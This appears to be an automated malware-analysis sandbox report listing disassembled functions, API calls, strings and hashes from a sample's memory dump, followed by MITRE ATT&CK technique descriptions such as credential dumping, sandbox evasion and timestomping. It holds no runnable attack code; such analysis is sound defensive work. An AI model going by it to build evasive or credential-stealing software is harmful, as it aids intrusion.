Opcode ID: 9b887c3e663908e7c98a3ec05ab34cd4c00332f062fa8d444597a7c9de78dd12
Instruction ID: 43a00bb14f9f0ff40b43464a9b8a55ed1880c885ef9fba65f4bf036d73b17aaf
Opcode Fuzzy Hash: 9b887c3e663908e7c98a3ec05ab34cd4c00332f062fa8d444597a7c9de78dd12
Instruction Fuzzy Hash: E6219F75910201EFEB289F64CD0AABABBB9FF08300F24442EF841D6250EBF49D40DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004422A2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 004422F2

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 92702a7b8ed6e28c5361de1aeb194af747686c0a4c8e5b2cfe3b663adac8b1a3
Instruction ID: 833370d3eaa65e38dfba4e1ee47fa186d91f098c02ba35cc9f3018033bb00555
Opcode Fuzzy Hash: 92702a7b8ed6e28c5361de1aeb194af747686c0a4c8e5b2cfe3b663adac8b1a3
Instruction Fuzzy Hash: E6110B31A01621ABEB228F759D80A5F77749F05760B510162FC41B7391E7FCED01C6EA

Uniqueness

Uniqueness Score: -1.00%

Function 004448FF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004448F4,?,?,004448BC,00000000,00000000,?), ref: 00444914
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00444927
FreeLibrary.KERNEL32(00000000,?,?,004448F4,?,?,004448BC,00000000,00000000,?), ref: 0044494A

Strings

CorExitProcess, xrefs: 0044491F
mscoree.dll, xrefs: 0044490D

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 248d97604ef844b277bd9179f488a53211341c4b072b839e5044c7f088c77912
Instruction ID: 94e6527f65575eeadfcd35fe8f398d871ece5c1f1a995c27574bdad37cb4f005
Opcode Fuzzy Hash: 248d97604ef844b277bd9179f488a53211341c4b072b839e5044c7f088c77912
Instruction Fuzzy Hash: 64F08231500619FBEB119B51DC0ABDE7A68EF40765F100071E501B3260EBB88E10EA9A

Uniqueness

Uniqueness Score: -1.00%

Function 0045CF66, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045CFE8
_free.LIBCMT ref: 0045D00C
_free.LIBCMT ref: 0045D199
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00471420), ref: 0045D1AB
_free.LIBCMT ref: 0045D365

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: bb809f23cdd997eeb7a02b056536bcbf82f6f8443790367db4223a265d89757c
Instruction ID: 4a991e17c787d30e5ae8b3ad44973b5ce093ade94d125a2907dffbd1dab576c1
Opcode Fuzzy Hash: bb809f23cdd997eeb7a02b056536bcbf82f6f8443790367db4223a265d89757c
Instruction Fuzzy Hash: E8C10771D00204AFDB20AF698C41AAE7BA9EF45715F1444AFEC8197383E7388D4AC79C

Uniqueness

Uniqueness Score: -1.00%

Function 0045A698, Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0045A71C
__alloca_probe_16.LIBCMT ref: 0045A7E2
__freea.LIBCMT ref: 0045A84E

Part of subcall function 00456E6E: RtlAllocateHeap.NTDLL(00000000,0043C5D3,00000000,?,0043E9FE,00000002,00000000,?,?,?,004098D6,0043C5D3,00000004,00000000,00000000,00000000), ref: 00456EA0

__freea.LIBCMT ref: 0045A857
__freea.LIBCMT ref: 0045A87A

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: da08f668ff40b939d61c659ed1765895692b38200cf1a5f5f52e21bf36bd13ab
Instruction ID: 37ed6ea5a360232de1d8240b7da7f361425b87ce637d8a7c65c350b43a176eae
Opcode Fuzzy Hash: da08f668ff40b939d61c659ed1765895692b38200cf1a5f5f52e21bf36bd13ab
Instruction Fuzzy Hash: B351F672500206BFEB206F51CC41EBB36A9EF48755F15422FFD04A7242EB3CDC29866A

Uniqueness

Uniqueness Score: -1.00%

Function 0043AB51, Relevance: 7.6, APIs: 5, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00DB6F70,?,00000000,?,0043B0D2,?,?,?,00000001,00000000), ref: 0043AB99
SetFilePointer.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,0043B0D2,?,?,?,00000001,00000000), ref: 0043ABCA
GetLocalTime.KERNEL32(0043B0D2,?,0043B0D2,?,?), ref: 0043ABF9
SystemTimeToFileTime.KERNEL32(0043B0D2,00000001,?,0043B0D2,?,?), ref: 0043AC07
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC39

Part of subcall function 0043A6F9: GetFileInformationByHandle.KERNEL32(00000001,?,00000001,00DB6F70,00000000), ref: 0043A70D

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 89576305-0
Opcode ID: bddc53799e6e5e0a305333b5f8bcf5b9bee22e40147bbf74233cb31ad76cf669
Instruction ID: 7c6a5a0df312f19c862c1f2de8c40b886eab29f8fa11f293710d119a6d0da691
Opcode Fuzzy Hash: bddc53799e6e5e0a305333b5f8bcf5b9bee22e40147bbf74233cb31ad76cf669
Instruction Fuzzy Hash: F0319072500B08AFD725CF69C885AABBBF8FF48304F04492EF596C2660E7B4A944CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0045EE49, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045EE61

Part of subcall function 00455CC3: RtlFreeHeap.NTDLL(00000000,00000000,?,0045F0EB,?,00000000,?,00000002,?,0045F38E,?,00000007,?,?,0045F78F,?), ref: 00455CD9
Part of subcall function 00455CC3: GetLastError.KERNEL32(?,?,0045F0EB,?,00000000,?,00000002,?,0045F38E,?,00000007,?,?,0045F78F,?,?), ref: 00455CEB

_free.LIBCMT ref: 0045EE73
_free.LIBCMT ref: 0045EE85
_free.LIBCMT ref: 0045EE97
_free.LIBCMT ref: 0045EEA9

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 43860f5af7d5668fac4ca4bba4f60d631842c2dc3f0984c7fd8f67ed8b4c6157
Instruction ID: b45403a6b69790d8e7796e5ab717bf1ee379ee2411f5d375ce95c078739d68ba
Opcode Fuzzy Hash: 43860f5af7d5668fac4ca4bba4f60d631842c2dc3f0984c7fd8f67ed8b4c6157
Instruction Fuzzy Hash: 70F04432514B10A7C765EB5AF596C6B73E9AA00B127550C1EF858D7603C728FD84879C

Uniqueness

Uniqueness Score: -1.00%

Function 004245C1, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004245C6

Strings

m_object != nullptr, xrefs: 004245E9
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004245E4
cannot compare iterators of different containers, xrefs: 0042462E

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$cannot compare iterators of different containers$m_object != nullptr
API String ID: 3519838083-339906781
Opcode ID: c29bed0ea2ad22f627daf422eb1e2434dd5d46e2be37ce76a42295c0e5c566c2
Instruction ID: 044dc147dcd04a9abdcedf50bc37349d49d6f4773b23c280b1ac74105914725f
Opcode Fuzzy Hash: c29bed0ea2ad22f627daf422eb1e2434dd5d46e2be37ce76a42295c0e5c566c2
Instruction Fuzzy Hash: 3311CB316002119BC710DB99D982A9AB7F4FF51718FA0882BE459E3640E73CFE41CA59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2E5, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48COMMON

Download Yara Rule

APIs

std::system_error::system_error.LIBCPMT ref: 0040A353

Strings

ios_base::failbit set, xrefs: 0040A311, 0040A34D
ios_base::eofbit set, xrefs: 0040A316
ios_base::badbit set, xrefs: 0040A307, 0040A327

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2416138045-1866435925
Opcode ID: 09f7b524ccb74fbf4b845b860c34d9fddab1a96a0b95e5aa92fef0e926716698
Instruction ID: 0ad27dcd77e8e6268f09a4d1d4b9384f4550b2cea4f5b694aceab62054717924
Opcode Fuzzy Hash: 09f7b524ccb74fbf4b845b860c34d9fddab1a96a0b95e5aa92fef0e926716698
Instruction Fuzzy Hash: CC01D4729043086BCB10AA54C802BEA77989B40354F54C47BFE49BA2C2E67DAD11CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004644EE, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004645BE
_free.LIBCMT ref: 004645E7
SetEndOfFile.KERNEL32(00000000,00461DBC,00000000,004585B9,?,?,?,?,?,?,?,00461DBC,004585B9,00000000), ref: 00464619
GetLastError.KERNEL32(?,?,?,?,?,?,?,00461DBC,004585B9,00000000,?,?,?,?,00000000), ref: 00464635

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 5e27bfcc58abd857a1e161b5d9729b73d30574e1c0a02173bb5527ddcbbb7534
Instruction ID: af4878a0e51e99018200008c32e4be39f64bf80e0bcf89e1c41e24443e279aea
Opcode Fuzzy Hash: 5e27bfcc58abd857a1e161b5d9729b73d30574e1c0a02173bb5527ddcbbb7534
Instruction Fuzzy Hash: B541F872900600ABDF11ABA9DC42A9F37A5AF95334F15011BFA25E7292FA3CCD45472F

Uniqueness

Uniqueness Score: -1.00%

Function 0042E844, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E7B0

Part of subcall function 004324C8: __EH_prolog.LIBCMT ref: 004324CD
Part of subcall function 004324C8: _strcat.LIBCMT ref: 00432525

Part of subcall function 0040BF84: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,?,?,?,?,00000000,00000000,?), ref: 0040BF97
Part of subcall function 0040BF84: DeleteFileTransactedA.KERNEL32 ref: 0040BFAE
Part of subcall function 0040BF84: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000,00000000,?,?,?,004184D2,00000012,00000000), ref: 0040BFB9

Strings

1z, xrefs: 0042E750
w, xrefs: 0042E75F, 0042E7F2, 0042E7FD, 0042E80C, 0042E837
], xrefs: 0042E84D

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$CommitCreateDeleteFileH_prologTransacted_strcatlstrlen
String ID: ]$1z$w
API String ID: 2985377347-2383281831
Opcode ID: 062bed4575d790f14d87ffc308bc2cc7db3f4fd72deaf1e5b3184ff7798e6216
Instruction ID: 9c8ab28cd8d1e5345e76a26b62ddaa14a770000797caa591351786f43101d207
Opcode Fuzzy Hash: 062bed4575d790f14d87ffc308bc2cc7db3f4fd72deaf1e5b3184ff7798e6216
Instruction Fuzzy Hash: 6F318C31A001589ACF18F7B1D855BEDB7B19F54308F1081AFA546732C2DF781B89CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00454EAB, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,004427D1,00000000,00000000,?,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454EB0
_free.LIBCMT ref: 00454F0D
_free.LIBCMT ref: 00454F43
SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454F4E

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 0cea3369d43b98dcea5ce71939ea948eb79bd536525b3c5057d48ac21d063a3e
Instruction ID: 5f9715313261c761e562a57d0d2160223eac716a3bf64265659832cf6e415d55
Opcode Fuzzy Hash: 0cea3369d43b98dcea5ce71939ea948eb79bd536525b3c5057d48ac21d063a3e
Instruction Fuzzy Hash: 8011E7322006003AC751267A6C86D2F25599BC577FB26063FFD249B2D3DE2E8C9D472D

Uniqueness

Uniqueness Score: -1.00%

Function 00414A2D, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,?,00000000,?,?,00417C45,?,?,?), ref: 00414A43
CopyFileTransactedA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414A69
CommitTransaction.KTMW32(00000000,?,00417C45,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 00414A74
RollbackTransaction.KTMW32(00000000,?,00417C45,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 00414A7C

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$CommitCopyCreateFileRollbackTransacted
String ID:
API String ID: 2868256026-0
Opcode ID: ef3bd1602192d500b1cbc2ab896a1476c7f18235841f2f0bbab2466a3e4d3165
Instruction ID: a53d333eb46b75c4dc6eaaf1247b5521dbae3d20c5520bdca0375636afa1e9d4
Opcode Fuzzy Hash: ef3bd1602192d500b1cbc2ab896a1476c7f18235841f2f0bbab2466a3e4d3165
Instruction Fuzzy Hash: D8F0A471240111BFB7144A549C88DB7376CDF867B17110525FD21D62D0E7A49CD18BBB

Uniqueness

Uniqueness Score: -1.00%

Function 004643EB, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(0044423A,0043CBF9,?,00000000,0044423A,?,004610FF,0044423A,00000001,0044423A,0044423A,?,0045564B,00000000,8304488B,0044423A), ref: 00464402
GetLastError.KERNEL32(?,004610FF,0044423A,00000001,0044423A,0044423A,?,0045564B,00000000,8304488B,0044423A,00000000,0044423A,?,00455B9F,00000010), ref: 0046440E

Part of subcall function 004643D4: CloseHandle.KERNEL32(FFFFFFFE,0046441E,?,004610FF,0044423A,00000001,0044423A,0044423A,?,0045564B,00000000,8304488B,0044423A,00000000,0044423A), ref: 004643E4

___initconout.LIBCMT ref: 0046441E

Part of subcall function 00464396: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004643C5,004610EC,0044423A,?,0045564B,00000000,8304488B,0044423A,00000000), ref: 004643A9

WriteConsoleW.KERNEL32(0044423A,0043CBF9,?,00000000,?,004610FF,0044423A,00000001,0044423A,0044423A,?,0045564B,00000000,8304488B,0044423A,00000000), ref: 00464433

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 1933cfb0267be48cf9ac2989c51ed86be4ed32e23342bd5df446837686ed8b04
Instruction ID: 960e4171badd8e6f81632a378233e5f5e1c50f28215b52fb945e60e05c487941
Opcode Fuzzy Hash: 1933cfb0267be48cf9ac2989c51ed86be4ed32e23342bd5df446837686ed8b04
Instruction Fuzzy Hash: 77F03036501659BBCF225FD2DC05A8E3F66FB497A1F014025FE08A5231EB7288709BDA

Uniqueness

Uniqueness Score: -1.00%

Function 00452812, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045281B

Part of subcall function 00455CC3: RtlFreeHeap.NTDLL(00000000,00000000,?,0045F0EB,?,00000000,?,00000002,?,0045F38E,?,00000007,?,?,0045F78F,?), ref: 00455CD9
Part of subcall function 00455CC3: GetLastError.KERNEL32(?,?,0045F0EB,?,00000000,?,00000002,?,0045F38E,?,00000007,?,?,0045F78F,?,?), ref: 00455CEB

_free.LIBCMT ref: 0045282E
_free.LIBCMT ref: 0045283F
_free.LIBCMT ref: 00452850

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 996f8e5cdb257ebadedf99124e433bb30977756956aa52648a54fccf1245ff77
Instruction ID: 3285f1664788a1904a5e0958de1577b6b6599e6311faba0240ff71fbe701e20d
Opcode Fuzzy Hash: 996f8e5cdb257ebadedf99124e433bb30977756956aa52648a54fccf1245ff77
Instruction Fuzzy Hash: 28E0B671800B21AEC7426F15FE2289D3A75E784F55349082FF82013737C73906569BDD

Uniqueness

Uniqueness Score: -1.00%

Function 004505BD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0045064D

Strings

pow, xrefs: 00450625, 00450642

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 57d01269f056e7f7e63193843bd2daccb7471543ab08e9ab1da84346818c733a
Instruction ID: 0f0fdc6838eaca0e4e21cd28c1d1fc07688d821662bf5c0042883d0a0db48948
Opcode Fuzzy Hash: 57d01269f056e7f7e63193843bd2daccb7471543ab08e9ab1da84346818c733a
Instruction Fuzzy Hash: 36518C759043028ECB127718D98136B27A4DB40743F244D6FEC99863A7EA3C8CDDDA8E

Uniqueness

Uniqueness Score: -1.00%

Function 004248B9, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004248BE

Strings

is_contiguous, xrefs: 00424943
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0042493E

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$is_contiguous
API String ID: 3519838083-1910854552
Opcode ID: 76a6f449d86ef157aadbafe59541608ace80d54a28e175da53166ae70662e4c0
Instruction ID: 57f7dc00d7740480bb4bc8b465f976962c8220b03d0e2374c4bc452aa06228bf
Opcode Fuzzy Hash: 76a6f449d86ef157aadbafe59541608ace80d54a28e175da53166ae70662e4c0
Instruction Fuzzy Hash: 094104B5E042499FDB19CFA9D4416AEFBF0EB49300B24C06ED899E7341D6349941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A229, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041A22E

Part of subcall function 0041A359: __EH_prolog.LIBCMT ref: 0041A35E

Part of subcall function 0041A136: __EH_prolog.LIBCMT ref: 0041A13B

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

Part of subcall function 0041A101: std::exception::exception.LIBCONCRT ref: 0041A122

Strings

parse_error, xrefs: 0041A25B
parse error, xrefs: 0041A28C

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocatestd::exception::exception
String ID: parse error$parse_error
API String ID: 3877490255-1820534363
Opcode ID: 622f6d9f51167d56ca67cd39ab3000c48f0609496bfac4872f0b6628fef9ba9a
Instruction ID: 820b4f15401a0c91bbd317f39951969c43dbcae619df4ffd7d56194712bbb2a6
Opcode Fuzzy Hash: 622f6d9f51167d56ca67cd39ab3000c48f0609496bfac4872f0b6628fef9ba9a
Instruction Fuzzy Hash: E0317C30900258DFCB14EFA5C991BEDBBB5BF14308F40806EE455B7292DB781E89CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042435B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00424360

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00424416
object != nullptr, xrefs: 0042441B

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: aff38bd3064e974ab6eccf27286a9e60e90d5611965fa47d994b6501c4777785
Instruction ID: 8b5687956de9e07e11a18c2a87093594cdfa3276bdb626c612d60e8432897b48
Opcode Fuzzy Hash: aff38bd3064e974ab6eccf27286a9e60e90d5611965fa47d994b6501c4777785
Instruction Fuzzy Hash: 85212231B006269BC701EF69D0916AEBBB0FF95304F50C21BE85993B51DB38DA00CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041A359, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041A35E

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

Strings

at line , xrefs: 0041A3B1
, column , xrefs: 0041A3C7

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: at line $, column
API String ID: 3708980276-191570568
Opcode ID: fbd9747db54ae4cc8b6dd9fe43139a3da29bfcd600180384c55509b8bc3ccacf
Instruction ID: 7c1c3bf67f5c61a93085bd2d8a5d43e8df60fc6c07afd18d3d9913b4eb87f4eb
Opcode Fuzzy Hash: fbd9747db54ae4cc8b6dd9fe43139a3da29bfcd600180384c55509b8bc3ccacf
Instruction Fuzzy Hash: 25219F759101489FCB09EBA5C851AEEB778EF94314F40416FE012A3181EF782E49CB15

Uniqueness

Uniqueness Score: -1.00%

Function 0042474C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00424751

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0042478E
object != nullptr, xrefs: 00424793

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: 2b4f37a92d49d2ad0bf043828e1431008fa795c12f7a8a1482665231561b6bd7
Instruction ID: d93b04fd548397bb6467770d5a8e61cdea888bbdb847919fe22699c69ce420af
Opcode Fuzzy Hash: 2b4f37a92d49d2ad0bf043828e1431008fa795c12f7a8a1482665231561b6bd7
Instruction Fuzzy Hash: 76F062B2E002149BC721DF6994026CEBFF4DB88B50F10453FE409E7241E7788A0487D9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
